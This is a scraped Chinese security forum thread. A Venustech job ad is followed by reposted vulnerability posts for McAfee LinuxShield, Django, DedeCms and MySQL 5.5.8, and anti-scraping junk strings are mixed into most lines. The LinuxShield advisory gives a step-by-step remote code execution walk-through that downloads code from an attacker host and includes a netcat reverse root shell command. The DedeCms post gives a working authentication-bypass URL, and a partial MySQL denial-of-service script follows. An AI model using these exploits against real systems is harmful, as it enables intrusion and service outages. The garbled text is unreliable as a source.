最近看过此主题的会员

返回列表 发帖

[人才招聘] [招聘] 启明星辰研发招聘

  • 招聘职位: 其他职位
  • 公司名称: 启明星辰
  • 工作地点: 北京
  • 专业要求: 其他 
  • 学历要求: 本科
  • 工作经验: 2年以上
  • 职位薪金: 面议
  • 年龄要求: 不限
  • 性别要求: 不限 
  • 公司网址: http://www.venustech.com.cn
  • 简历邮箱: xiaoyan@sitedirsec.com
  • 联系电话: 00000000000
  • 在线QQ:
  • 安全助手: 通过非安全中国管理人员招聘/求职,QQ群:57116771


  • ++++++++++启明星辰相关说明++++++++++

    站内发信给我就行了。9 q' N* L4 ]# r0 f

    / N1 D+ E) k. L6 R5 w% l2 v# W

    一、研发中心:Linux C软件工程师(若干)

    岗位职责:

    1.$ m% t4 b0 \5 c- Z( X7 J  v  Y
    安全网关,防火墙,IPS等嵌入式设备软件开发,维护

    岗位要求:

    1.6 o6 `  k' Y& x/ Y  X" T/ }
    精通C语言编程

    2.( ^; H2 u: \# w5 a, u
    熟练使用Linux操作系统,精通 Linux下C语言编程

    3.. l1 x# A. |/ ^8 Y* l+ L
    精通TCP /IP 等网络协议,熟悉应用层协议,及协议分析

    4.& `, ~$ u/ C, l! o( a
    熟悉网络安全协议及路由器、交换机、防火墙等安全设备

    5.: ?0 C7 G4 f; A6 [  [
    熟悉Linux内核及开发

    二、研发中心:测试工程师(若干)

    岗位职责:

    1.' U$ z* E% [0 _: L3 i" i% h
    负责产品的系统测试、集成测试工作

    2.9 i, d; R# ]8 e( o
    负责产品用例的编写,执行、修改

    3.
    / r+ b& \5 W% \: `负责产品性能的测试

    4.* e* t+ W$ V" R. E8 ]/ S" f" c  L
    负责对外项目的支持和测试工作

    岗位要求:

    1.
    / q5 c. _. I% D, k掌握基本的tcp/ip知识

    2.  S' Y: ~4 y; [/ E$ G
    数通基础好

    3.% O/ O2 M9 q, |2 T! ~, M
    对linux有一定的基础

    4.
    1 ~, t$ U4 P5 N  P/ J$ ]6 F; E掌握数据库的搭建和使用

    5.
    " @3 S7 U8 U- [% h# c至少熟悉一种编程语言C/Perl/VBS/TCL

    6.  F( A/ J- ]& p2 N5 d$ r; T/ ]7 G8 [
    熟悉测试用例设计,熟悉系统测试,熟悉压力测试

    7.6 X  s, S& k+ Q- ~* f9 O* x
    熟悉防火墙相关原理,对于防火墙的一些功能特性有一定的了解

    8.
      z9 C( I1 M4 I3 u$ s对网络安全设备在网络中的部署有一定的认识

    9.
    % T0 s& `# s9 d掌握测试工具的使用:Loadrunner、包分析软件、思博伦或IXIA的测试仪

    三、研发中心:安全事件工程师(若干)

    岗位职责:              

    1.
    : e" M- N3 c& N. j. v$ M; b% M4 b
    木&马检测服务、WEB漏洞扫描服务的实施

    2.& M7 k% g- k6 r! ?
    对服务客户的技术支持

    3.
      V' |. P# V+ z% o
    对于网页木&马,WEB漏洞、蠕虫、扫描、拒绝服务、缓冲溢出等的研究

    4.  S) @6 ]1 P! \0 j& R0 _1 f2 [
    对IDS/IPS/UTM/TDS/WAG/322等产品的安全事件库进行日常升级和维护

    5./ P4 h# t- e( N4 d
    对各种攻击手段的研究;TCP/IP协议的研究;逆向工程的研究

     

    您可能还想看的主题:

    启明星辰招聘

    非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
    2、本话题由:小妍发表,本帖发表者小妍符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
    3、其他单位或个人使用、转载或引用本帖时必须征得发表者小妍和本站的同意;
    4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
    5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
    6、本站管理员和版主有权不事先通知发帖者而删除本文。
    收藏 分享

    McAfee LinuxShield 本地/远程代码执行漏洞
    McAfee LinuxShield remote/local code) B8 X' Y) n4 w8 v! k. V
    影响版本: McAfee LinuxShield <= 1.5.1! U1 m' s4 b, o% E
    远程攻击: Yes & l1 J# g5 G* U1 z4 R
    本地溢出: Yes
    ' y+ H! r. Q* O7 C3 l背景阅读:! Y; i$ O1 ~" X4 n. {* g2 N
    ===========
    ! v" s! L- N( K! _
    / ], _8 @# L% x3 l, B  K) @LinuxShield detects and removes viruses and other potentially unwanted
    2 X( t/ y$ \2 }4 gsoftware on Linux-based systems. LinuxShield uses the powerful McAfee8 s" w0 B  G0 q
    scanning engine ?&amp;#65533;&amp;#65533; the engine common to all our
    9 a0 Y' e' R3 o, n/ x3 E( Eanti-virus products.: b; e: P! C- e

    3 o8 F6 q) ]3 ]) `9 h% x  v# LAlthough a few years ago, the Linux operating system was considered a% T1 m6 J+ b( Z
    secure environment, it is now seeing more occurrences of software
    ! U0 c( G6 K3 f  k1 c9 Sspecifically written to attack or exploit security weaknesses in$ A4 A$ F4 Z% C" G/ u
    Linux-based systems. Increasingly, Linux-based systems interact with
    & Y: w, o; `8 @9 i9 c. h, }Windows-based computers. Although viruses written to attack Windows-( N5 v1 o2 S& w0 i0 r  a! g
    based systems do not directly attack Linux systems, a Linux server
    / U/ y' d3 ?, B# U. Q. Y0 m% ycan harbor these viruses, ready to infect any client that connects to9 C6 @+ l1 e) w# g8 m* r; L* `
    it.8 ?3 y3 X% T5 J' O; U8 e

      b4 I% {) p  \  _  z( @0 f9 T' }* rWhen installed on your Linux systems, LinuxShield provides protection& C8 P: P+ L- J' q: r
    against viruses, Trojan horses, and other types of potentially
    $ n: V3 U) \# L2 P5 {6 ounwanted software." @/ M# ?  r( e( ^
      U5 y& z0 S, W3 H, p  D
    LinuxShield scans files as they are opened and closed' |& K! w& u; x- f+ W
    ?&amp;#65533;&amp;#65533; a technique
    - f: j( s5 p1 `+ v* xknown as on-access scanning. LinuxShield also incorporates an  F0 c* J- c7 s: U) |* [, o
    on-demand scanner that enables you to scan any directory or file in' ~! C, y  z& u$ e* [2 C
    your host at any time.2 ^- Z$ q& C& q+ K% r
    # G% ^; J. W. C) s- ?) ], X+ Q
    When kept up-to-date with the latest virus-definition (DAT) files,  l& m, G; a+ R, L+ l: Q- S
    LinuxShield is an important part of your network security. We
    2 t3 {8 M/ G( S3 C7 G( e5 J2 G$ Vrecommend that you set up an anti-virus security policy for your
      f* [, G! }" ~$ P. z% _4 w9 Hnetwork, incorporating as many protective measures as possible.$ F. W! L: @/ e4 R
    / O8 |% e: b& t4 k- t
    LinuxShield uses a web-browser interface, and a large number of
    ( N" z" m- x; ?4 d  c. I, Z, RLinuxShield installations can be centrally controlled by ePolicy: h8 f2 \; c5 H
    Orchestrator.
    3 l1 E6 f8 `4 a$ G4 t4 C8 U) f4 b0 p+ x8 \- r- L5 b
    (Product description from LinuxShield Product Guide)
    3 q5 d1 E2 L0 c$ ?0 ~
      Y2 o3 S1 I: j) t, C5 s/ F8 p$ B3 ~

    ! E/ _# J: v, D0 p5 |Description:% f& }4 s9 F( E' c' k
    ============4 t+ k3 p- d" y$ }) \+ Q
    & T0 o- `( B9 s
    This vulnerability allows remote attackers to execute arbitrary code, O- g6 Y  Z. N- N: ?
    on vulnerable installations of McAfee LinuxShield. User interaction" u4 [( D9 t; o
    is not required to exploit this vulnerability but an attacker must8 a- s: M9 e9 o  u, {
    be authenticated.( v3 S  f2 m( Q) ^+ @4 Y3 p/ e

    / H% V& S. u/ c% o& w, v& UThe LinuxShield Webinterface communicates with the localy installed/ ]9 n9 B, `/ D3 U4 f) A7 q
    "nailsd" daemon, which listens on port 65443/tcp, to do
    + P( n+ z- O! y, @3 |# [- Z9 {  Jconfiguration
    . U* L; k8 `" u& P: g, Xchanges, query the configuration and execute tasks.
    0 _2 u0 j% Q3 B  ]3 i
    ! p# w8 V0 r1 tEach user, which can login to the victim box, can also authenticate
    6 z: c) P7 |: f: e! A7 W# dit self to the "nailsd" and can do configuration changes and
    / \' c" X% P6 |; y5 q  i+ Gexecute
    2 i! ]- l5 V8 _! L; W" j( g, mtasks with root privileges.- R& F, X) C! M

    3 r" K- f- r8 {2 `' \3 `A direct execution of commands is not possible, but it is possible to; G6 G3 b' V- b: |/ ]
    download and execute code through manipulation of the config and2 n) g* W% ~, f+ }( D+ j6 G
    execute schedule tasks of the LinuxShield.
    4 b& \) R8 d; I- f# @4 W* ]0 w
    % o' J5 z3 o# D
    ' \# v9 f0 I" S# _! nwalk-through (after the TLS handshake):
    ( [$ A. g* \2 P7 P- j+ v' {$ E+--------------------------------------
    & O7 |2 B* l0 t$ s* V: V2 _9 O& D. R! Q
    nailsd > +OK welcome to the NAILS Statistics Service- D0 A2 s' @" h; F& I- a! S7 y  q
    attacker> auth <user> <pass>- }! R0 E6 |/ o& a7 }
    nailsd > +OK successful authentication9 p$ g# V; {! y" _

    : c& k, g+ x% ]( X' e1 w) u2 {# Set the Attacker repository to download our code from a httpd3 j$ I$ c3 s4 L% t* Q# g( `* Y
    # (catalog.z)7 D7 \& d- U1 [9 ^" i( z
    #---------------------------------------------------------------  n! p0 O. g- l2 @
    attacker> db set 1 _table=repository status=1 siteList=<?xml version6 k5 D9 @5 O# X) b& j: N
    ="1.0" encoding="UTF-8"?><ns:SiteLists
    4 {4 k! o) g1 ~( t( `2 Qxmlns:ns="naSiteLi, v( W) n5 v& R( d* m
    st" GlobalVersion="20030131003110"
    * o/ r; M8 S6 d) |% V% h  nLocalVersion="20091209
      }5 t  u1 R: e& q8 z  K161903" Type="Client"><SiteList
    ) R! ?/ a+ F# d$ l0 A$ ?1 }( mDefault="1" Name="SomeGU+ x" `6 O# J6 j0 l
    ID"><HttpSite Type="repository"6 i1 m' f  m4 y/ [
    Name="EvilRepo" Order="1
    4 f3 B  n6 `# f* Q" Server="<attackerhost>:80"
    * H% P' f# e/ H+ [2 U8 rEnabled="1" Local="1"><Rela. o, I/ q7 D2 w( O4 x9 g
    - r9 Q0 E0 i7 d/ @# ~8 D$ E( z2 K
    tivePath>nai</RelativePath><UseAuth>0</UseAuth><Use4 W( N$ L# E: {; u2 H& g+ g0 Y
    rName><// ^. A% |! z! P3 A- o- X9 _* \  m
    UserName><Password  s8 p' d8 b9 |6 [" K. \
    Encrypted="0"/></HttpSite></SiteList></. P1 U* n+ `! j, E% _' w* g
    ns:SiteLists> _cmd=update
    - h5 `' L2 N- O9 j7 c4 `( I$ Anailsd > +OK database changes buffered.& M3 ?4 d7 L( _
    2 q7 l2 P! a7 S" N
    # Execute task to set the attacker repository, O+ z+ L, g4 M3 [
    #---------------------------------------------------------------: K$ X& d: ]" x3 }4 H
    attacker> task setsitelist7 t& j: h: ~3 f
    nailsd > +OK setting sitelist from CMA.7 q; J/ m$ ~* f& e5 n( W4 q
    + G3 e" S$ }  g  o, }* {; J
    # Execute the default Update task to download the code2 ^; k7 K0 D' {& Q
    #---------------------------------------------------------------- I$ w9 c& A" k1 |% {" l5 W- M- i
    attacker> task nstart LinuxShield Update9 g/ O3 Y$ r6 U2 c  {' r* S8 X
    nailsd > +OK task LinuxShield Update starting
    5 G$ S+ @! [/ h$ w$ a0 f
    ' |# X3 Q& l2 A* M# Create a Scan profile, which executes our code. The profiles are% H; ^* u4 _6 ]) Y! g
    # not stored in the database.
    , ?; n7 A- N, K8 `# Scan Profiles: /var/opt/NAI/LinuxShield/etc/ods.cfg! i: A$ ^. U+ f+ h6 P0 j8 n5 ?
    #---------------------------------------------------------------9 E/ L8 |2 f; {4 z# m4 {' G
    attacker> sconf ODS_99 begin
    * Z2 t3 M0 C7 Y! G  Znailsd > +OK 1260400888% B5 j% [3 Y7 s3 V) a' t
    2 E7 |% b5 m7 U
    # Set the variable "nailsd.profile.ODS_99.scannerPath" to the
    ! F( g& e4 [1 ]! A% j2 zpath
    ' F: f$ i! H) u  V% [" I9 o" t# where our earlier downloaded catalog.z file is stored.
    6 ^& O8 U' _! r) p0 f# (/opt/McAfee/cma/scratch/update/catalog.z)
    5 R5 ^, {: L, _  n; i#---------------------------------------------------------------: v/ I& M- Z$ W! k, M
    attacker> sconf ODS_99 set 1260400888 nailsd.profile.ODS_99.allFiles=
    / Z( s& n  {7 g% utrue nailsd.profile.ODS_99.childInitTmo=60 nailsd.profile.O
    0 Z: \8 }7 m5 S% `DS_99.cleanChildren=2 nailsd.profile.ODS_99.cleansPerChild=6 I) E+ ^5 Z" h# Z3 m
    10000 nailsd.profile.ODS_5.datPath=/opt/NAI/LinuxShield/eng6 Y; |( S7 e% N8 @+ F& v. }/ i# Q
    ine/dat nailsd.profile.ODS_99.decompArchive=true nailsd.pro; i( m7 b, u: u& v
    file.ODS_99.decompExe=true nailsd.profile.ODS_99.engineLibD9 h" ^7 R) E* u. B& b' U
    ir=/opt/NAI/LinuxShield/engine/lib nailsd.profile.ODS_99.en
    0 l4 m$ Z, Q, `ginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so nailsd% E5 j6 b- Y% U3 X9 g# j4 ]
    .profile.ODS_99.factoryInitTmo=60 nailsd.profile.ODS_99.heu
    ; T; t8 l2 X: W% RristicAnalysis=true nailsd.profile.ODS_99.macroAnalysis=tru
    0 B. j8 t' C9 x7 j5 A4 ]e nailsd.profile.ODS_99.maxQueSize=32 nailsd.profile.ODS_99
    / u. W5 f0 R7 Z, K* l) p1 ^.mime=true nailsd.profile.ODS_99.noJokes=false nailsd.profi: [0 N2 X$ I, {; G
    le.ODS_99.program=true nailsd.profile.ODS_99.quarantineChil
    ( i: S5 `/ \# m, [+ U* {* ?# y9 hdren=1 nailsd.profile.ODS_99.quarantineDirectory=/quarantin
    " j; ^3 M2 h/ [" E2 Ze nailsd.profile.ODS_99.quarantinesPerChild=10000 nailsd.pr
    % }( D8 k' P! {  @7 Tofile.ODS_99.scanChildren=2 nailsd.profile.ODS_99.scanMaxTm* o. L( F3 _# K) t/ V
    o=301 nailsd.profile.ODS_99.scanNWFiles=true nailsd.profile% ]" Y0 b& N: t0 ?
    .ODS_99.scanOnRead=true nailsd.profile.ODS_99.scanOnWrite=t% O  y, O$ J: ~1 K2 N6 I1 w* H
    rue nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scrat: T$ u  H+ K3 A. C/ o5 e: P/ c7 Y
    ch/update/catalog.z nailsd.profile.ODS_99.scansPerChild=100
    1 Y5 C9 a, Z. V4 s: N, V. K2 `00 nailsd.profile.ODS_99.slowScanChildren=0 nailsd.profile.0 d  w! W. b" f" H: f5 r# Z
    ODS_99.filter.0.type=exclude-path nailsd.profile.ODS_99.fil
    & w7 Q, u: ?, w# v4 d. Ater.0.path=/proc nailsd.profile.ODS_99.filter.0.subdir=true
    6 l) f+ D  u, W2 I# fnailsd.profile.ODS_99.filter.extensions.mode=all nailsd.pr
    ' c& y/ V* S- j/ d4 `+ U) n$ u9 L. [ofile.ODS_99.filter.extensions.type=extension nailsd.profil1 K  V% r1 Q! [" m; F
    e.ODS_99.action.Default.primary=Clean nailsd.profile.ODS_99
      h$ Z3 u$ I. l" A9 w7 b7 G.action.Default.secondary=Quarantine nailsd.profile.ODS_99.& f4 x. U6 l) U5 k: l( L
    action.App.primary=Clean nailsd.profile.ODS_99.action.App.s
    5 t* B3 _2 u, J! ~0 secondary=Quarantine nailsd.profile.ODS_99.action.timeout=Pa6 u( r9 D6 A. J& C
    ss nailsd.profile.ODS_99.action.error=Block8 C) e/ q; N1 A4 @% _
    nailsd > +OK configuration changes buffered
    ( B" F, ~" g* M0 Iattacker> sconf ODS_99 commit 1260400888' l8 V2 ^6 |" R9 V+ o" |
    nailsd > +OK configuration changes stored
    % m% \6 g  r! f, Q# g
    % k) m9 D! ~+ x' B6 N# Set a scan task with the manipulated profile to execute the code
    ! |: Q4 {. l3 Q- w& n  ^9 f( i- I, o/ ?#---------------------------------------------------------------
    * A4 L9 p; [9 y% Q5 m* J7 pattacker> db set 1260400888 _table=schedule taskName=Evil Task taskTy
    3 ^' t' C9 p2 q, K) Tpe=On-Demand taskInfo=profileName=ODS_99,paths=path:/root/t/ D+ I/ k9 |$ }/ o' J, G
    mp;exclude:false timetable=type=unscheduled taskResults=0 i; x, G, u0 a- n4 h9 Z* T
    _lastRun=1260318482 status=Stopped _cmd=insert$ `4 Y- H6 j7 E8 C. N$ m& y+ g
    nailsd > +OK database changes buffered
    2 }% K% _* [9 t; W2 A! f% W# k: @, h! S' N' s, k
    # Execute scan task to execute the code
    : i3 [: s" j, `1 i% e#---------------------------------------------------------------, c  t; U6 r. z' P" _, a- k4 z
    attacker> task nstart Evil Task4 j8 K' i9 J' i1 o( J+ p

      N' y" T' ^( b  O& n0 {+-------------------------------------- walk-through EOF# p/ D/ i( x! N0 q
    / Y3 Q, ?; s" }  B8 b- v& _# A

    . w- B0 w  T+ I/ N6 jTo get a reverse root shell place something like this in the catalog.z+ f5 i! p& e% f% p. y

    & d1 p( |2 P$ K4 F& f" k--- snip ---8 c) }7 K# f8 o$ c+ F3 e
    #!/bin/sh! v. L; z# H2 b- C$ k3 V
    nc -nv <attacker_host> 4444 -e /bin/sh3 g& S: w' U3 F4 x
    --- /snip ---
      T: r* x6 |4 ~) c: g
      ^  o+ q+ b, C; w- ?, a/ Q2 C# C! T4 r' A  p3 o

    # P. w. l! g  jProof of Concept :
    2 b' q1 [& M, g2 y! F==================) _6 X1 ]5 H/ [1 r& M7 f* U& y

    3 U$ A2 a# W1 ?2 W, p3 Mhttp://inj3ct0r.com/sploits/11165.tar.gz
    * E+ {: ]: E' B# Y, H% v' K4 t5 i5 T- [( C# A8 q( n) c

    - ^) C$ g5 \( m. Y" N" t' P0 Z! l0 e6 z4 E  b7 N" K
    Solution:" M5 `, u- C' b
    =========
    * w+ b, i/ V6 x5 a9 p, Q) w5 ?) E% ]5 O+ B5 Y# A7 w$ E
    McAfee Advisory
    * T5 I/ H* ]7 n9 U+--------------3 I) R7 i$ d3 }) E, P* w
    https://kc.mcafee.com/corporate/index?page=content&amp;id=SB100075 J. L0 V0 k- s: c6 U; {

    7 G! i9 u' ^5 s% Z4 C$ `/ F+ d3 @; o6 \% Q$ n( N% s; g

    0 H" T8 I* @: O* F: o- ?2 nDisclosure Timeline (YYYY/MM/DD):
      y7 J# H! [1 d9 @=================================
    ! Y% U, U6 Y* R/ q7 @2 Q3 P; n+ W+ O9 @# B9 ?3 A. S) D4 `7 g
    2009.12.07: Vulnerability found, w. a7 l6 z1 n, K- {
    2010.02.03: Asked vendor for a PGP key4 a; c* u  T( ?) k8 C/ m( F' g) [
    2010.02.05: Vendor sent his PGP key& T4 p; K! d. v" n
    2010.02.05: Sent PoC, Advisory, Disclosure policy and planned disclosure& |; g" d7 ]1 ~4 w
    date (2010.02.18) to Vendor
    4 O% K3 K4 E: t; B- Z* k2010.02.05: Vendor acknowledges the reception of the advisory
    ( e9 P6 X, @: b7 {5 {: |6 J2010.02.16: Ask for a status update, because the planned release date is$ K1 d& n& u( \3 g- ^8 _
    2010.02.18.
    # r6 n2 K3 Q" T0 K# ]) F* ?2010.02.16: Vendor response that, they are currently working on a patch
    3 c( |5 o# {8 d- O4 r$ j2010.02.17: Changed release date to 2010.02.25.
    1 r$ f1 [  J$ Y7 Q& o* ]/ J2010.02.22: Vendor gives a status update, that they are able to release: [0 h( u+ X* n
    the patch on 2010.02.25.. T) a: Y( l: a1 v6 }- o( y4 d
    2010.02.24: Ask for a list of affected products and the advisory url.2 n! b# G: Z- C* d; f) I
    2010.02.24: Vendor sends the list.+ c2 E- U5 Q# @( k
    2010.03.02: Release of this Advisory
    0 E9 F% D, j0 ^8 f, M. w7 e* e) G% H

    + E( S0 h, L6 o" ]- K2 t% ?% \4 M- Y9 M7 a* i# Q" `
    ) [4 t0 I/ f" D, ?: @( m" L. _

    + f& {- M1 L( l, _: @9 V' }
    & o) B( @+ s7 C
    9 Z& k7 I# ]0 ~% ]( X% E. [. L6 [; }/ Z: o/ e/ g) z7 p: c
    ! w2 p, N1 l4 j0 Z+ G) z. B" u

    $ U: C6 q- l0 Y5 H$ `! t3 v# F6 @9 z! f5 F# D3 R: s7 K
    0 I% H; _1 h5 ~* v' z

    , K9 E4 b: A) m; I
    - [& e4 T3 S) B, o3 F8 N
      x! x- h" E. f$ J/ B
    ) o6 v5 u: k: Q  R* f! r& p8 u: ^" l' g! y
    - [: ]! Z. L/ y/ Z# u+ y

    0 T3 ^+ }( ]7 N+ t0 ~( L
    4 t) x( I, q3 O: [  {
    / g+ q: Z0 T# d2 v公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    Django开发框架多个安全漏洞
    发布时间: 2011-09-12

    / [$ }- a( W$ U5 ^+ K
    影响版本:
    " L4 H  `: K6 ^  G! VDjango 1.2.5, D1 K  k  T2 f; g$ F7 y7 ~
    Django 1.3 beta 1
    ( e  w' |3 t' u  YDjango 1.2.4
    1 L5 v3 N4 a( s6 w; I7 H) Q4 CDjango 1.2.2
    : [7 _& o: Z6 N, w' a9 t! j8 `" RDjango 1.2

    . j+ g, [5 D% B, |* q) t
    漏洞描述:

      d4 p7 r8 \: S
    Django是一款开放源代码的Web应用框架,由Python写成。; A; H9 |" g- W+ ~0 X0 }
    Django存在多个安全漏洞,允许攻击者获得敏感信息,操作数据,进行缓存毒药攻击或进行拒绝服务攻击。
    6 [4 g( M8 [& ^1)当使用缓存后端时django.contrib.sessions中处理会话存在错误,可被利用操作会话信息。要成功个利用漏洞需要已知会话KEY和应用程序允许攻击者使用合法会话KEY储存字典类对象到缓冲中。9 H2 H# g' f9 ^- D8 U, Q" ~
    2)Django模型系统包括一个字段类型-- URLField --,用于校验提供的值是否为合法URL,如果布尔关键字参数verify_exists为真,会尝试校验提供的URL并解析。默认情况下,底层套接字没有超时设置,攻击者可以利用此漏洞发送特制URL消耗所有服务器内存,造成拒绝服务攻击。! c7 n. O+ Y1 S
    3)当校验提供给"URLField"字段类型的URLs处理重定向应答存在错误,攻击者可以利用此漏洞把重定向应答返回给"file://" URL,可判断服务器上的本地文件是否存在。
    0 N4 R% g% s9 C! G4 h4)当生成重定向应答的全路径URL时处理"X-Forwarded-Host" HTTP头存在错误,攻击者可以利用此漏洞进行缓存毒药攻击。

    : J) Z) H5 d# x% V! A% z8 w
    细节参考: * h7 c: U1 N' _5 c! G
    https://www.djangoproject.com/weblog/2011/sep/09/security-releases-issued/
    4 ^+ J4 E( {  z5 D4 Mhttp://secunia.com/advisories/45939/
    6 M4 i, q! S+ n+ z  R) C
    4 X; N6 y5 t+ v0 \8 K9 i/ q
    ' e( Y2 F) U* u- n! [2 k

    ) ~2 J9 Z0 r* \( z/ m- i# X# |
    ( G* l0 ^0 C) @
    % T( L/ _* b' G
    + v5 V6 H' r+ e9 h% t5 m
    ) t- p  E3 i+ Q: E. V9 ^4 q
    ( v1 P) l, y5 t6 M! t/ U" K) l: r. I3 k% H( g7 }$ X/ L

    4 R; F5 `' q: x2 P. o
    ; ?( h8 R  L1 w7 ?1 ?4 X$ R0 w8 O7 X; \( b* c. ~

    ! [: y# a( ?% y4 r2 V) n  _( N! R1 T, l5 B3 X
    , f: M: |& w/ a! l5 e! U8 W

      @# t+ a$ Q- C6 \$ ]8 V$ v
    4 h1 T% y9 Z2 c7 g' z! m2 B- B5 q0 J$ _# c/ F' Q3 a/ `6 Y8 ]
    , M  v/ R1 b$ r" `3 l
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    手把手教你装Linux系统-设置虚拟机工具
    <P align=center>
    & W8 j& n! A6 n8 n8 Q9 `, `) |5 `1 z) V6 |
    http://www.sitedir.com.cn/video/8.swf[/quote]
    + N' o# P" L; j
    0 d+ D+ o* W" S5 c; p6 c2 i  }- p& @2 D
    - ^& r/ c& {  t

    ' X2 W% W8 @7 a4 J9 m) m
    2 W; H  E" [' G' z+ z# x3 \; m$ \& b8 e- o
    3 T7 A5 b' i! n7 N) O2 J6 c

    6 j! @$ u5 v% H  J, x6 ^( Q( q  @: d: x- r# v

    5 }% \2 V! }# x( N6 o$ h& D- P$ y' g5 C9 O  D! O0 t: [
    6 ?$ u& X+ Z+ v" V4 b

    : T' k* P1 \9 E; J7 |3 T
    # j) @  g/ `5 z, _7 [* H
    + P+ d9 v  K: {+ R! Z  }0 \
    3 ~$ Z, Y( [/ _; K
    5 f# I% c5 w0 c! N1 {% |% S! V! w- O
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    织梦(DedeCms) v5.6-5.7 越权访问漏洞
    http://www.XXXX.com/织梦网站后台/login.php?dopost=login&amp;validate=dcug&amp;userid=admin&amp;pwd=inimda&amp;_POST[GLOBALS][cfg_dbhost]=116.255.183.90&amp;_POST[GLOBALS][cfg_dbuser]=root&amp;_POST[GLOBALS][cfg_dbpwd]=r0t0&amp;_POST[GLOBALS][cfg_dbname]=root

    # O7 W+ d) g8 o: c! p4 l
    把上面validate=dcug改为当前的验证码,即可直接进入网站后台

    2 |. k" V* N# K* Z, \
    此漏洞的前提是必须得到后台路径才能实现
    5 _/ l  W* V: v, @! ~' }
    官方临时解决办法:
    0 E3 m* R7 [3 A1 y/ t0 I
    找到include/common.inc.php文件,把:
      _1 @. B% B+ v* }5 g. F& N
        foreach($_REQUEST as $_k=>$_v)' g: j3 i$ J3 c* X, j% i$ x
        {
    9 O5 e' \; K- {3 \) N        var_dump($_k);! n8 k- ~  i9 e5 B
            if( strlen($_k)>0 &amp;&amp; preg_match('#^(cfg_|GLOBALS)#',$_k) )
    + ?) H3 z! i1 ?% o        {, ~% K0 m. z" z& @9 T7 l
                exit('Request var not allow!');
    0 J" I: q6 r$ G. F- P        }$ \+ K# m" R: g
        }

      p: |2 D4 w, ^+ c& o
    换成:
    . U8 E7 ]5 t) v. l
        //检查和注册外部提交的变量
    2 Q4 X* \6 u9 Z9 x    function CheckRequest(&amp;$val) {
    - c- q6 g/ T2 P6 v8 \" _* |6 |        if (is_array($val)) {0 G* K# B% e3 d
                foreach ($val as $_k=>$_v) {
    1 n5 q- @9 |- @# J                CheckRequest($_k);
    - S/ y: x8 R0 d% n                CheckRequest($val[$_k]);
    ( P6 |/ M8 Y5 R, v3 I# ^            }0 B5 b1 Q, E5 [+ D0 n. ?/ d! E
            } else
    4 W7 \3 P+ z& P4 l+ L+ x6 i, W+ V        {' o5 Q3 r  X1 j2 w
                if( strlen($val)>0 &amp;&amp; preg_match('#^(cfg_|GLOBALS)#',$val) )/ X  o- m. G, w* `7 r+ }
                {
    % B) ]9 n6 {. |3 n' s                exit('Request var not allow!');
    ! ~8 v/ f. U' t9 G* e" Y' C8 C            }  U: {, a$ q2 R: S) W
            }
    , j8 A$ D* l& a, M    }9 F- U4 e! K" _" k' T
        CheckRequest($_REQUEST);7 u6 ^! R) h; r/ d/ Z9 g
    5 P& T3 R, z" T, a
    * E* O$ i  y- j4 a; |2 K9 g0 c7 H
    5 L/ H$ g" y# _( q4 X3 @

      f% U4 a; `, p. Q
    ; X" `/ d& _  W  A1 z5 t
      F; f7 \3 k# u" D, ^# j
    4 t0 f/ ]7 y2 }. A9 v( C) r& n; A- G$ ]" d# n) h6 ~

    7 P8 H9 f+ z; {. d
    # z6 L  U* \( q/ V$ [2 l8 |& {/ X- S, ~

    . k" L7 C: h! M2 I, w. I8 [$ U! c8 j: ]: h7 z
    7 t0 N, J% J, q' B; Q. R- L
      h5 v, R. K' v: b9 m
    , S; U* y, u. b$ X
    * ^0 X/ B  L2 ]" u4 p
    & m0 ~, P7 |  ]0 ?! f
    0 l/ T; p" F% J
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    手把手教你装Linux系统-设置虚拟机

    0 o# G2 d, }6 a" k8 jhttp://www.sitedir.com.cn/video/4.swf
    + W7 A1 j* `0 F2 U8 l( K$ N7 F: _- d" ]

    % _. i( G) Q* y8 H/ z# K0 [3 X; n) P$ _1 }4 J
    * ]  e+ e; B; O9 @* ?! L  [. U
    ' E2 j3 E, x* c7 F

    $ S& U9 v. K* ]- J8 a
    1 N, T& a, A3 u( m: o3 i. P
    * I3 ]6 }  R& b" I/ }, z& c7 P+ _) S

    4 Z& r$ F3 ~. B# {7 D/ ?* v
    ) ?  u, [1 `: Q9 o$ a0 _% L, u4 k1 s/ v" G4 I4 D! r2 j
    . o* x  p& n( `% P

    3 u  P' H0 c0 k8 s0 K# |+ I
    % B- O; z; |5 R, n
    9 t, i0 {; V+ D3 z7 P$ v% C! i+ w/ W
    9 c9 e" i" I/ X  |- |7 c$ i/ S$ X" ]/ b/ c) _' y
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    MySQL 5.5.8 远程拒绝服务漏洞
    import socket, sys
    9 ~- y5 G( O1 u! ]$ M. K. ` 3 M8 Q" S: l; i; i
    print "( o+ V3 F2 g4 ?) n
    ": J# c9 h( j+ y5 A) J
    print "----------------------------------------------------------------"2 ~' o* m( x9 N9 U1 N
    print "| MySQL 5.5.8 Null Ptr (windows)                                |"
    ! l7 G" l% n! rprint "| Level Smash the Stack                                         |"
    $ X/ R1 f3 l) q3 H, Q+ e% [: i6 Iprint "----------------------------------------------------------------"7 ^$ K3 Y8 ?$ C; v  ^0 N
    print "4 ]8 ^+ W. F. i4 d% r* ~$ h& ]
    "  T  {- ?9 T4 i! L+ Y+ d
    ; q" t7 O& @' H7 U" q
    buf=("&amp;x00x00x01x85xa2x03x00x00x00x00@x93x00x00x00x00x00x00x00x00"* q! |3 i8 z) G- G" p+ X8 d7 E  V
    "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00rootx00x00"): o+ z( o& U" z& Y! o

    1 ]3 Z6 ]& b! Obuf2=("x11x00x00x00x03set autocommit30")
    & ~- Z+ q: D; B9 @! F5 C
    - g# S7 U* m2 z" cdef usage():' n7 U( x& f* y$ B
    print "usage : ./mysql.py <victim_ip>"" j& V0 e2 U; M' |, N
    print "example: ./mysql.py 192.168.1.22"- E# a# |" P/ H2 t

